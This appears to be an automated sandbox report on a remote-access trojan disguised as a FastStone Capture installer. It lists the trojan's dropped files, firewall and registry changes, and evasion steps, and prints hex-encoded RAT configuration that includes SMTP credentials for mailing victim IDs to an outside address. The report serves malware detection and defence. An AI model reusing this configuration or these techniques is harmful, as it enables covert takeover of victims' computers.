Malware Analysis Report

2024-11-15 08:39

Sample ID 220427-v7g2lsbbgj
Target 0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94
SHA256 0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94
Tags
rms discovery evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94

Threat Level: Known bad

The file 0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94 was found to be: Known bad.

Malicious Activity Summary

rms discovery evasion rat trojan

RMS

Drops file in Drivers directory

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Runs ping.exe

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-27 17:37

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-04-27 17:37

Reported

2022-04-27 19:29

Platform

win10v2004-20220414-en

Max time kernel

185s

Max time network

192s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

Signatures

RMS

trojan rat rms

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FastStone Capture\FSCapture.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCaptureHelp.chm C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSFocus.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCapture.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCrossHair.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSLogo.png C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3733392d3236372d3832322d3730353c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006